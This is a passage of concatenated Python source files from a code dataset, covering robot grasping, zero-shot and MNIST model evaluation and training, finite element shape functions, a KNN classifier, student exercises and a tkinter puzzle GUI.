return []\n\n block_pose_stamped = geometry_msgs.msg.PoseStamped()\n block_pose_stamped.pose = objects[goal.grasp.object_name]\n block_pose_stamped.header.frame_id = self.grasping_controller.get_planning_frame()\n\n rospy.loginfo(\"Object {} in planning scene. Pose: {}\".format(goal.grasp.object_name, block_pose_stamped.pose))\n\n # Shift block pose to place location in param server\n block_pose_stamped.pose.position.x = rospy.get_param(\"final_block_position_x\")\n block_pose_stamped.pose.position.y = rospy.get_param(\"final_block_position_y\")\n block_pose_stamped.pose.position.z = rospy.get_param(\"final_block_position_z\")\n\n rospy.loginfo(\"Placing block as position ({}, {}, {})\"\n .format(block_pose_stamped.pose.position.x,\n block_pose_stamped.pose.position.y,\n block_pose_stamped.pose.position.z))\n\n # Convert graspit grasp to moveit grasp\n moveit_grasp_msg = self._graspit_grasp_to_moveit_grasp(goal.grasp)\n\n # Execute pick on block\n success, pick_result = self.grasping_controller.execute_moveit_grasp(goal.grasp.object_name, moveit_grasp_msg)\n # type: pick_result -> moveit_msgs.msg.PickupResult\n\n if not success:\n rospy.logerr(\"Failed to execute pick. Reason:\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully executed pick\")\n\n # Execute place on block\n success, place_result = self.grasping_controller.place(goal.grasp.object_name, pick_result, block_pose_stamped)\n\n if not success:\n rospy.logerr(\"Failed to execute place. Reason\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully executed place\")\n\n # Home arm and open hand\n success = self.grasping_controller.home_arm()\n if not success:\n rospy.logerr(\"Failed to home arm\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully homed arm\")\n\n success = self.grasping_controller.open_hand()\n if not success:\n rospy.logerr(\"Failed to open hand\")\n self._execute_grasp_as.set_aborted(result)\n return []\n else:\n rospy.loginfo(\"Successfully opened hand\")\n\n result.success = True\n self._execute_grasp_as.set_succeeded(result)\n\n return []\n\n def _run_recognition_cb(self, goal):\n rospy.loginfo(\"Running recognition\")\n result = graspit_msgs.msg.RunObjectRecognitionResult()\n # type: result -> graspit_msgs.msg.RunObjectRecognitionResult\n\n self.world_manager_client.clear_objects()\n\n detected_blocks = self.block_recognition_client.find_blocks()\n # type: detected_blocks -> typing.List[block_recognition.msg.DetectedBlock]\n\n if len(detected_blocks) == 0:\n rospy.loginfo(\"Detected no blocks. No work done. \")\n self._run_recognition_as.set_succeeded(result)\n return []\n\n rospy.loginfo(\"Detected {} blocks\".format(len(detected_blocks)))\n\n for detected_block in detected_blocks:\n # Add all blocks to the scene\n self.world_manager_client.add_box(detected_block.unique_block_name,\n detected_block.pose_stamped,\n detected_block.edge_length,\n detected_block.edge_length,\n detected_block.edge_length)\n\n self.tf_listener.waitForTransform(self.world_frame, detected_block.unique_block_name, rospy.Time(0), rospy.Duration(10))\n detected_block_world_pose = pm.toMsg(pm.fromTf(self.tf_listener.lookupTransform(self.world_frame, detected_block.unique_block_name, rospy.Time(0))))\n\n # Add blocks to graspit result\n object_info = graspit_msgs.msg.ObjectInfo(\n detected_block.unique_block_name,\n detected_block.mesh_filename,\n detected_block_world_pose\n )\n result.object_info.append(object_info)\n\n rospy.loginfo(\"Finished recognition\")\n self._run_recognition_as.set_succeeded(result)\n return []\n\n\ndef main():\n try:\n crui_manager = CRUIManager()\n loop = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n loop.sleep()\n moveit_commander.roscpp_shutdown()\n except rospy.ROSInterruptException:\n rospy.signal_shutdown(reason=\"Interrupted\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/crui_manager.py","file_name":"crui_manager.py","file_ext":"py","file_size_in_byte":12941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"427098530","text":"import argparse\nimport json\nimport os\nimport os.path as osp\nimport sys\nimport time\nimport torch\nfrom torch.utils.data import DataLoader\n\n\n\nfrom model import resnet\nfrom model import utils\nfrom model import image_folder\n\n\n\n\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_root', type=str, default='../data', help='root directory')\n parser.add_argument('--data_dir', type=str, default='AZSL-D', help='data directory')\n parser.add_argument('--dataset', type=str, default='ImNet_A', help='ImNet_A, AwA')\n parser.add_argument('--gpu', default='0')\n parser.add_argument('--consider-trains', action='store_true')\n parser.add_argument('--no-pred', action='store_true')\n parser.add_argument('--pred', type= str, default='', help='the predicted classifier name')\n\n\n args = parser.parse_args()\n\n DATA_DIR = os.path.join(args.data_root, args.data_dir)\n DATASET = args.dataset\n EXP_NAME = 'Exp1_DGP'\n\n # the directory of testing data features\n test_feat = os.path.join(DATA_DIR, DATASET, 'Test_DATA_feats')\n\n if DATASET == 'ImNet_A':\n data_split = os.path.join(DATA_DIR, DATASET, 'seen-unseen-split.json')\n if DATASET == 'AwA':\n data_split = os.path.join(DATA_DIR, DATASET, 'awa2-split.json')\n\n # predict classifiers\n # awa: 300\n pred_file = os.path.join(DATA_DIR, 'ImNet_A', EXP_NAME, 'epoch-'+args.pred+'.pred')\n\n # set_gpu(args.gpu)\n '''\n seen-unseen-split.json:\n split[train], split[test]\n '''\n\n split = json.load(open(data_split, 'r'))\n train_wnids = split['train']\n test_wnids = split['test']\n\n\n print('train: {}, test: {}'.format(len(train_wnids), len(test_wnids)))\n print('consider train classifiers: {}'.format(args.consider_trains))\n\n\n preds = torch.load(pred_file)\n pred_wnids = preds['wnids']\n pred_vectors = preds['pred'] # (3969, 2049)\n\n pred_dic = dict(zip(pred_wnids, pred_vectors)) # packed into tuple\n # select seen and unseen pred_vectors\n pred_vectors = utils.pick_vectors(pred_dic, train_wnids + test_wnids, is_tensor=True)\n\n n = len(train_wnids)\n m = len(test_wnids)\n\n\n # test_names = awa2_split['test_names']\n\n ave_acc = 0\n ave_acc_n = 0\n\n results = {}\n\n\n\n # total_hits, total_imgs = 0, 0\n total_hits = torch.FloatTensor([0, 0, 0, 0, 0]) # top 1 2 5 10 20\n total_imgs = 0\n for i, wnid in enumerate(test_wnids, 1):\n all_label = n + i - 1\n # hit = 0\n # tot = 0\n top = [1, 2, 5, 10, 20]\n hits = torch.zeros(len(top))\n tot = 0\n\n\n # load test features begin\n cls_path = osp.join(test_feat, wnid)\n paths = os.listdir(cls_path)\n feat_data = list()\n for path in paths:\n feat = torch.load(osp.join(cls_path, path))\n feat = torch.squeeze(feat)\n\n feat_data.append(feat)\n\n # test 100\n # if len(feat_data) > 100:\n # feat_data = feat_data[:100]\n\n feat_data = torch.stack(feat_data, dim=0)\n # print 'feat_data shape:', feat_data.shape\n # load test features end\n\n\n feat = torch.cat([feat_data, torch.ones(len(feat_data)).view(-1, 1)], dim=1)\n\n fcs = pred_vectors.t() # [2049, 50]\n\n table = torch.matmul(feat, fcs)\n # False: filter seen classifiers\n if not args.consider_trains:\n table[:, :n] = -1e18\n\n # for hit@1 and hit@2\n gth_score = table[:, all_label].repeat(table.shape[1], 1).t()\n rks = (table >= gth_score).sum(dim=1)\n assert (table[:, all_label] == gth_score[:, all_label]).min() == 1\n for j, k in enumerate(top):\n hits[j] += (rks <= k).sum().item()\n tot += len(feat_data)\n\n total_hits += hits\n total_imgs += tot\n\n # print('{}/{}, {}, total: {} : '.format(i, len(test_wnids), wnid, tot))\n # # hits = float(hits) / float(tot)\n # hits = [float(hit) / float(tot) for hit in hits]\n # output = ['{:.2f}'.format(i * 100) for i in hits]\n # print('results: ', output)\n\n print('total images: ', total_imgs)\n # total_hits = float(total_hits) / float(total_imgs)\n total_hits = [float(hit) / float(total_imgs) for hit in total_hits]\n output = ['{:.2f}'.format(i * 100) for i in total_hits]\n print('results: ', output)\n\n\n","sub_path":"AZSL-D/test_dgp.py","file_name":"test_dgp.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"349679728","text":"# Collaborators (including web sites where you got help: (enter none if you didn't need help)\n#\n\ndef avg_temp():\n with open('temps.txt') as file_object:\n line_list = file_object.readlines()\n list_length = len(line_list)\n sum_list = 0\n for i in range(1, list_length):\n line_list[i] = line_list[i].rstrip()\n sum_list = float(line_list[i])+sum_list\n print(line_list[i])\n print(sum_list)\n average_list = sum_list/(list_length-1)\n average_list = round(average_list, 2)\n\n return average_list\n\n\nif __name__ == '__main__':\n print(avg_temp())\n\n \n","sub_path":"my_code.py","file_name":"my_code.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"503814416","text":"# Exercise 04-09\n'''\nStudent Name: Charlie\nID: 201810101580044\nClass: Network 182\n'''\nmessage = str(input('please enter a word or sentence:'))\nfor i in message:\n if i == 'x':\n print('This has the letter \\'x\\' in it')\n break\nelse:\n print('This dose not has the letter \\'x\\' in it')\n","sub_path":"Python_OOP/Exercise/Exercise 04/201810701580044 - Charlie/excise04-09.py","file_name":"excise04-09.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"650287890","text":"\n# author:Hurricane\n# date: 2020/11/4\n# E-mail:hurri_cane@qq.com\n\nimport numpy as np\nimport struct\nimport matplotlib.pyplot as plt\nimport cv2 as cv\nimport random\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nimport time\nfrom tqdm import tqdm\n\n# 训练集文件\ntrain_images_idx3_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/train-images.idx3-ubyte'\n# 训练集标签文件\ntrain_labels_idx1_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/train-labels.idx1-ubyte'\n\n# 测试集文件\ntest_images_idx3_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/t10k-images.idx3-ubyte'\n# 测试集标签文件\ntest_labels_idx1_ubyte_file = 'F:/PyCharm/Practice/hand_wrtten/dataset/t10k-labels.idx1-ubyte'\n\n\n# 读取数据部分\ndef decode_idx3_ubyte(idx3_ubyte_file):\n bin_data = open(idx3_ubyte_file, 'rb').read()\n\n offset = 0\n fmt_header = '>iiii' # 因为数据结构中前4行的数据类型都是32位整型,所以采用i格式,但我们需要读取前4行数据,所以需要4个i。我们后面会看到标签集中,只使用2个ii。\n magic_number, num_images, num_rows, num_cols = struct.unpack_from(fmt_header, bin_data, offset)\n print('图片数量: %d张, 图片大小: %d*%d' % (num_images, num_rows, num_cols))\n\n # 解析数据集\n image_size = num_rows * num_cols\n offset += struct.calcsize(fmt_header) # 获得数据在缓存中的指针位置,从前面介绍的数据结构可以看出,读取了前4行之后,指针位置(即偏移位置offset)指向0016。\n print(offset)\n fmt_image = '>' + str(\n image_size) + 'B' # 图像数据像素值的类型为unsigned char型,对应的format格式为B。这里还有��上图像大小784,是为了读取784个B格式数据,如果没有则只会读取一个值(即一副图像中的一个像素值)\n print(fmt_image, offset, struct.calcsize(fmt_image))\n images = np.empty((num_images, 28, 28))\n # plt.figure()\n for i in tqdm(range(num_images)):\n image = np.array(struct.unpack_from(fmt_image, bin_data, offset)).reshape((num_rows, num_cols)).astype(np.uint8)\n # images[i] = cv.resize(image, (96, 96))\n images[i] = image\n # print(images[i])\n offset += struct.calcsize(fmt_image)\n\n return images\n\n\ndef decode_idx1_ubyte(idx1_ubyte_file):\n bin_data = open(idx1_ubyte_file, 'rb').read()\n offset = 0\n fmt_header = '>ii'\n magic_number, num_images = struct.unpack_from(fmt_header, bin_data, offset)\n print('图片数量: %d张' % (num_images))\n\n # 解析数据集\n offset += struct.calcsize(fmt_header)\n fmt_image = '>B'\n labels = np.empty(num_images)\n for i in tqdm(range(num_images)):\n labels[i] = struct.unpack_from(fmt_image, bin_data, offset)[0]\n offset += struct.calcsize(fmt_image)\n return labels\n\n\ndef load_train_images(idx_ubyte_file=train_images_idx3_ubyte_file):\n return decode_idx3_ubyte(idx_ubyte_file)\n\n\ndef load_train_labels(idx_ubyte_file=train_labels_idx1_ubyte_file):\n return decode_idx1_ubyte(idx_ubyte_file)\n\n\ndef load_test_images(idx_ubyte_file=test_images_idx3_ubyte_file):\n return decode_idx3_ubyte(idx_ubyte_file)\n\n\ndef load_test_labels(idx_ubyte_file=test_labels_idx1_ubyte_file):\n return decode_idx1_ubyte(idx_ubyte_file)\n\n\n# 构建网络部分\nclass Residual(nn.Module): # 本类已保存在d2lzh_pytorch包中方便以后使用\n def __init__(self, in_channels, out_channels, use_1x1conv=False, stride=1):\n super(Residual, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, stride=stride)\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1)\n if use_1x1conv:\n self.conv3 = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride)\n else:\n self.conv3 = None\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.bn2 = nn.BatchNorm2d(out_channels)\n\n def forward(self, X):\n Y = F.relu(self.bn1(self.conv1(X)))\n Y = self.bn2(self.conv2(Y))\n if self.conv3:\n X = self.conv3(X)\n return F.relu(Y + X)\n\n\nclass GlobalAvgPool2d(nn.Module):\n # 全局平均池化层可通过将池化窗口形状设置成输入的高和宽实现\n def __init__(self):\n super(GlobalAvgPool2d, self).__init__()\n\n def forward(self, x):\n return F.avg_pool2d(x, kernel_size=x.size()[2:])\n\n\ndef resnet_block(in_channels, out_channels, num_residuals, first_block=False):\n # num_residuals:残差数\n if first_block:\n assert in_channels == out_channels # 第一个模块的通道数同输入通道数一致\n blk = []\n for i in range(num_residuals):\n if i == 0 and not first_block:\n blk.append(Residual(in_channels, out_channels, use_1x1conv=True, stride=2))\n else:\n blk.append(Residual(out_channels, out_channels))\n return nn.Sequential(*blk)\n\n\ndef evaluate_accuracy(img, label, net):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n acc_sum, n = 0.0, 0\n with torch.no_grad():\n X = torch.unsqueeze(img, 1)\n if isinstance(net, torch.nn.Module):\n net.eval() # 评估模式, 这会关闭dropout\n acc_sum += (net(X.to(device)).argmax(dim=1) == label.to(device)).float().sum().cpu().item()\n net.train() # 改回训练模式\n else: # 自定义的模型, 3.13节之后不会用到, 不考虑GPU\n if ('is_training' in net.__code__.co_varnames): # 如果有is_training这个参数\n # 将is_training设置成False\n acc_sum += (net(X, is_training=False).argmax(dim=1) == label).float().sum().item()\n else:\n acc_sum += (net(X).argmax(dim=1) == label).float().sum().item()\n n += label.shape[0]\n return acc_sum / n\n\nclass FlattenLayer(torch.nn.Module):\n def __init__(self):\n super(FlattenLayer, self).__init__()\n def forward(self, x): # x shape: (batch, *, *, ...)\n return x.view(x.shape[0], -1)\n\nif __name__ == '__main__':\n print(\"train:\")\n train_images_org = load_train_images().astype(np.float32)\n train_labels_org = load_train_labels().astype(np.int64)\n print(\"test\")\n test_images = load_test_images().astype(np.float32)[0:1000]\n test_labels = load_test_labels().astype(np.int64)[0:1000]\n # 数据转换为Tensor\n train_images = torch.from_numpy(train_images_org)\n train_labels = torch.from_numpy(train_labels_org)\n test_images = torch.from_numpy(test_images)\n test_labels = torch.from_numpy(test_labels)\n # test_images = load_test_images()\n # test_labels = load_test_labels()\n\n # 查看前十个数据及其标签以读取是否正确\n for i in range(5):\n j = random.randint(0, 60000)\n print(\"now, show the number of image[{}]:\".format(j), int(train_labels_org[j]))\n img = train_images_org[j]\n img = cv.resize(img, (600, 600))\n cv.imshow(\"image\", img)\n cv.waitKey(0)\n cv.destroyAllWindows()\n print('all done!')\n print(\"*\" * 50)\n\n # ResNet模型\n net = nn.Sequential(\n nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2, padding=1))\n\n net.add_module(\"resnet_block1\", resnet_block(64, 64, 2, first_block=True))\n net.add_module(\"resnet_block2\", resnet_block(64, 128, 2))\n net.add_module(\"resnet_block3\", resnet_block(128, 256, 2))\n\n net.add_module(\"global_avg_pool\", GlobalAvgPool2d()) # GlobalAvgPool2d的输出: (Batch, 512, 1, 1)\n net.add_module(\"fc\", nn.Sequential(FlattenLayer(), nn.Linear(256, 10)))\n\n # 测试网络\n X = torch.rand((1, 1, 28, 28))\n for name, layer in net.named_children():\n X = layer(X)\n print(name, ' output shape:/t', X.shape)\n\n # 训练\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n lr, num_epochs = 0.001, 100\n optimizer = torch.optim.Adam(net.parameters(), lr=lr)\n batch_size = 1000\n net = net.to(device)\n\n print(\"training on \", device)\n loss = torch.nn.CrossEntropyLoss()\n loop_times = round(60000 / batch_size)\n train_acc_plot = []\n test_acc_plot = []\n loss_plot = []\n for epoch in range(num_epochs):\n train_l_sum, train_acc_sum, n, batch_count, start = 0.0, 0.0, 0, 0, time.time()\n\n for i in tqdm(range(1, loop_times)):\n x = train_images[(i - 1) * batch_size:i * batch_size]\n y = train_labels[(i - 1) * batch_size:i * batch_size]\n x = torch.unsqueeze(x, 1) # 对齐维度\n X = x.to(device)\n y = y.to(device)\n y_hat = net(X)\n l = loss(y_hat, y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n train_l_sum += l.cpu().item()\n train_acc_sum += (y_hat.argmax(dim=1) == y).sum().cpu().item()\n n += y.shape[0]\n batch_count += 1\n test_acc = evaluate_accuracy(test_images, test_labels, net)\n print('epoch %d, loss %.4f, train acc %.3f, test acc %.3f, time %.1f sec'\n % (epoch + 1, train_l_sum / batch_count, train_acc_sum / n, test_acc, time.time() - start))\n torch.save(net.state_dict(), 'logs/Epoch%d-Loss%.4f-train_acc%.4f-test_acc%.4f.pth' % (\n (epoch + 1), train_l_sum / batch_count, train_acc_sum / n, test_acc))\n print(\"save successfully\")\n\n test_acc_plot.append(test_acc)\n train_acc_plot.append(train_acc_sum / n)\n loss_plot.append(train_l_sum / batch_count)\n\n x = range(0,100)\n plt.plot(x,test_acc_plot,'r')\n plt.plot(x, train_acc_plot, 'g')\n plt.plot(x, loss_plot, 'b')\n print(\"*\" * 50)\n","sub_path":"hand_wrtten_train.py","file_name":"hand_wrtten_train.py","file_ext":"py","file_size_in_byte":9787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"428549857","text":"#!/usr/bin/env python\n#\n# Copyright 2013 Hewlett-Packard Development Company, L.P.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nfrom os import path\n\nfrom tuskar.storage.exceptions import UnknownName\nfrom tuskar.storage.stores import MasterSeedStore\nfrom tuskar.storage.stores import ResourceRegistryStore\nfrom tuskar.storage.stores import TemplateStore\n\n\nMASTER_SEED_NAME = '_master_seed'\nRESOURCE_REGISTRY_NAME = '_registry'\n\n\ndef _load_file(role_path):\n\n with open(role_path) as role_file:\n return role_file.read()\n\n\ndef _create_or_update(name, contents, store=None):\n\n if store is None:\n store = TemplateStore()\n\n try:\n role = store.retrieve_by_name(name)\n\n if role.contents != contents:\n role = store.update(role.uuid, contents)\n\n return False, role\n except UnknownName:\n return True, store.create(name, contents)\n\n\ndef role_name_from_path(role_path):\n return path.splitext(path.basename(role_path))[0]\n\n\ndef load_roles(roles, seed_file=None, resource_registry_path=None,\n dry_run=False):\n \"\"\"Given a list of roles files import them into the\n add any to the store. TemplateStore. When dry_run=True is\n passed, run through the roles but don't\n\n The returned tuple contains all the role names and then the names split\n over where were created and updated. On a dry run the first item will\n contain all of the roles found while the second two will be empty lists as\n no files were updated or created.\n\n :param roles: A list of yaml files (as strings)\n :type roles: [str]\n\n :param seed_file: full path to the template seed that should be used for\n plan master templates\n :type seed_file: str\n\n :param resource_registry_path: path to the Heat environment which\n declares the custom types for Tuskar roles.\n :type resource_registry_path: str\n\n :return: Summary of the results as a tuple with the total count and then\n the names of the created and updated roles.\n :rtype: tuple(list, list, list)\n \"\"\"\n\n all_roles, created, updated = [], [], []\n\n roles = [(role_name_from_path(r), r) for r in roles]\n\n for name, role_path in roles:\n\n contents = _load_file(role_path)\n all_roles.append(name)\n\n if dry_run:\n continue\n\n role_created, _ = _create_or_update(name, contents)\n\n if role_created:\n created.append(name)\n else:\n updated.append(name)\n\n if seed_file is not None:\n contents = _load_file(seed_file)\n seed_created, role = _create_or_update(MASTER_SEED_NAME, contents,\n store=MasterSeedStore())\n all_roles.append(MASTER_SEED_NAME)\n\n if seed_created:\n created.append(MASTER_SEED_NAME)\n else:\n updated.append(MASTER_SEED_NAME)\n\n if resource_registry_path is not None:\n contents = _load_file(resource_registry_path)\n store = ResourceRegistryStore()\n registry_created, role = _create_or_update(RESOURCE_REGISTRY_NAME,\n contents,\n store=store)\n all_roles.append(RESOURCE_REGISTRY_NAME)\n if registry_created:\n created.append(RESOURCE_REGISTRY_NAME)\n else:\n updated.append(RESOURCE_REGISTRY_NAME)\n\n return all_roles, created, updated\n","sub_path":"tuskar/storage/load_roles.py","file_name":"load_roles.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"243239137","text":"import numpy as np\r\n\r\n\r\nclass ShapeFunction:\r\n \"\"\"Class which contains functions to calculate the N matrix and the B matrix\r\n Inputs:\r\n 1) (self.xi, self.eta) = natural coordinates\r\n 2) vertex_coord = coordinates of the vertex points\r\n 3) el_type = type of element used in meshing\r\n el_type = 0 (4 noded quadrilateral)\r\n el_type = 1 (8 noded quadrilateral)\"\"\"\r\n\r\n def __init__(self, xi, eta, el_type):\r\n self.xi = xi\r\n self.eta = eta\r\n self.el_type = el_type\r\n if self.el_type == 0:\r\n self.N = np.zeros((2, 8))\r\n elif self.el_type == 1:\r\n self.N = np.zeros((2, 16))\r\n self.J = np.zeros((2, 2))\r\n if self.el_type == 0:\r\n self.dpN = np.zeros((2, 4))\r\n elif self.el_type == 1:\r\n self.dpN = np.zeros((2, 8))\r\n\r\n def get_N_matrix(self):\r\n \"\"\"Calculate the N matrix\"\"\"\r\n\r\n if self.el_type == 0:\r\n # shape functions for 4 noded quadrilateral\r\n N1 = (1 - self.xi) * (1 - self.eta) / 4\r\n N2 = (1 + self.xi) * (1 - self.eta) / 4\r\n N3 = (1 + self.xi) * (1 + self.eta) / 4\r\n N4 = (1 - self.xi) * (1 + self.eta) / 4\r\n\r\n self.N[0, ::2] = np.array([N1, N2, N3, N4])\r\n self.N[1, 1::2] = np.array([N1, N2, N3, N4])\r\n return self.N\r\n\r\n elif self.el_type == 1:\r\n # shape function for 8 noded quadrilateral element\r\n N1 = -(1 - self.xi) * (1 - self.eta)*(1 + self.xi + self.eta) / 4\r\n N2 = (1 + self.xi) * (1 - self.eta) * (-1 + self.xi - self.eta) / 4\r\n N3 = (1 + self.xi) * (1 + self.eta) * (-1 + self.xi + self.eta) / 4\r\n N4 = (1 - self.xi) * (1 + self.eta) * (-1 - self.xi + self.eta) / 4\r\n N5 = (1 - self.xi ** 2) * (1 - self.eta) / 2\r\n N6 = (1 + self.xi) * (1 - self.eta ** 2) / 2\r\n N7 = (1 - self.xi ** 2) * (1 + self.eta) / 2\r\n N8 = (1 - self.xi) * (1 - self.eta ** 2) / 2\r\n\r\n self.N[0, ::2] = np.array([N1, N2, N3, N4, N5, N6, N7, N8])\r\n self.N[1, 1::2] = np.array([N1, N2, N3, N4, N5, N6, N7, N8])\r\n return self.N\r\n\r\n def compute_Jacobian(self, vertex_coord):\r\n \"\"\"Calculate the Jacobian matrix for 4 noded and 8 noded quadrilateral element\"\"\"\r\n\r\n # dpN = gradient of shape functions wrt natural coordinates (xi, eta)\r\n\r\n if self.el_type == 0:\r\n self.dpN[0, 0] = -(1 - self.eta) / 4\r\n self.dpN[1, 0] = -(1 - self.xi) / 4\r\n self.dpN[0, 1] = (1 - self.eta) / 4\r\n self.dpN[1, 1] = -(1 + self.xi) / 4\r\n self.dpN[0, 2] = (1 + self.eta) / 4\r\n self.dpN[1, 2] = (1 + self.xi) / 4\r\n self.dpN[0, 3] = -(1 + self.eta) / 4\r\n self.dpN[1, 3] = (1 - self.xi) / 4\r\n\r\n elif self.el_type == 1:\r\n self.dpN[0, 0] = -(1-self.eta)*(-2*self.xi-self.eta)/4\r\n self.dpN[1, 0] = -(1-self.eta)*(-self.xi-2*self.eta)/4\r\n self.dpN[0, 1] = (1 - self.eta) * (2*self.xi - self.eta) / 4\r\n self.dpN[1, 1] = -(1 - self.eta) * (-self.xi - 2 * self.eta) / 4\r\n self.dpN[0, 2] = (1 + self.eta) * (2*self.xi + self.eta) / 4\r\n self.dpN[1, 2] = (1 + self.eta) * (self.xi + 2 * self.eta) / 4\r\n self.dpN[0, 3] = (1 + self.eta) * (2*self.xi - self.eta) / 4\r\n self.dpN[1, 3] = (1 - self.eta) * (-self.xi + 2 * self.eta) / 4\r\n self.dpN[0, 4] = -2*self.xi * (1- self.eta) / 2\r\n self.dpN[1, 4] = (-1 + self.xi**2) / 2\r\n self.dpN[0, 5] = (1- self.eta**2)/2\r\n self.dpN[1, 5] = -2*self.eta*(1+self.xi) / 2\r\n self.dpN[0, 6] = -2*self.xi*(1+self.eta) / 2\r\n self.dpN[1, 6] = (1 - self.xi**2) / 2\r\n self.dpN[0, 7] = -(1 - self.eta**2) / 2\r\n self.dpN[1, 7] = (1 - self.xi)*(-2*self.eta) / 2\r\n\r\n self.J = np.dot(self.dpN, vertex_coord)\r\n\r\n def get_B_matrix(self):\r\n \"\"\"Calculates the strain displacement matrix (B)\"\"\"\r\n\r\n # dN = spatial gradient of shape functions\r\n dN = np.dot(np.linalg.inv(self.J), self.dpN)\r\n B = np.zeros((3, 2*self.dpN.shape[1]))\r\n\r\n B[0, ::2] = dN[0, :]\r\n B[1, 1::2] = dN[1, :]\r\n B[2, ::2] = dN[1, :]\r\n B[2, 1::2] = dN[0, :]\r\n\r\n return B\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"shape_function.py","file_name":"shape_function.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"193978611","text":"from sklearn.neighbors import NearestNeighbors\nfrom math import ceil\nimport numpy as np\nimport distances as dist\n\n\nclass KNNClassifier:\n\n def __init__(self, k, strategy, metric, weights, test_block_size):\n self.k = k\n self.strategy = strategy\n self.metric = metric\n self.weights = weights\n self.test_block_size = test_block_size\n self.eps = 10 ** (-5)\n\n def fit(self, X, y):\n self.y = y.astype(np.int)\n if self.strategy == 'my_own':\n self.X = X\n else:\n self.knn = NearestNeighbors(n_neighbors=self.k,\n algorithm=self.strategy,\n metric=self.metric\n )\n self.knn.fit(X, y)\n\n def find_kneighbors(self, X, return_distance):\n block_num = ceil(X.shape[0] / self.test_block_size)\n if return_distance:\n distances = np.zeros((X.shape[0], self.k))\n indices = np.zeros((X.shape[0], self.k))\n for i in range(0, block_num):\n begin = i * self.test_block_size\n end = (i + 1) * self.test_block_size\n X_block = X[begin:end, :]\n block_ind = None\n block_dist = None\n if self.strategy == 'my_own':\n if self.metric == 'euclidean':\n block_dist = dist.euclidean_distance(X_block, self.X)\n else:\n block_dist = dist.cosine_distance(X_block, self.X)\n block_ind = np.argsort(block_dist)[:, 0:self.k]\n if return_distance:\n block_dist = np.sort(np.partition(block_dist,\n self.k - 1)[:, 0:self.k])\n else:\n if return_distance:\n block_dist, block_ind = (self.knn.kneighbors(X=X_block,\n return_distance=return_distance))\n else:\n block_ind = (self.knn.kneighbors(X=X_block,\n return_distance=return_distance))\n indices[begin:end, :] = block_ind\n if return_distance:\n distances[begin:end, :] = block_dist\n if return_distance:\n return distances, indices.astype(np.int)\n else:\n return indices.astype(np.int)\n\n def predict(self, X):\n if self.weights:\n distances, indices = self.find_kneighbors(X, True)\n weights = 1 / (distances + self.eps)\n else:\n indices = self.find_kneighbors(X, False)\n res = self.y[indices]\n predict = np.zeros(X.shape[0])\n for i in range(0, res.shape[0]):\n count = None\n if self.weights:\n count = np.bincount(res[i], weights=weights[i])\n else:\n count = np.bincount(res[i])\n predict[i] = np.argmax(count)\n return predict\n","sub_path":"Метрические алгоритмы классификации/nearest_neighbors.py","file_name":"nearest_neighbors.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"654472574","text":"# Instructions to run--------------------------------------------------------------------------------------\n# In ubuntu/linux:\n# Make sure to install python3 and Mozilla Firefox in your environment\n# Open Terminal in the directory this file is located in\n# Type: python3 guiFinal.py\n# Instructions to run --------------------------------------------------------------------------------------\n\n# @desc: This program creates a GUI from the data given by filename \"file.txt\"\n# Just rename the data to \"file.txt\" and type make data in terminal\n#\n# @author: APOLLO\n# @date: 21/04/2020\n# @version: v2.0\n#\n\n# Import the tkinter library for the gui\nimport tkinter as tk\nimport time\nimport datetime\n\ncellSize = 75\n# Creating the grid table of the puzzle\ndef createTable():\n i = 0\n while i <= 5 * cellSize:\n j = 0\n while j <= 5 * cellSize:\n W.create_rectangle(i, j, cellSize, cellSize, outline='black')\n j+=cellSize\n i+=cellSize\n return\n\n# Marking numbers based on clues\nnumSize = 15\ndef markNum(j, i, num):\n x = cellSize * i + 10\n y = cellSize * j + 12\n W.create_text(x, 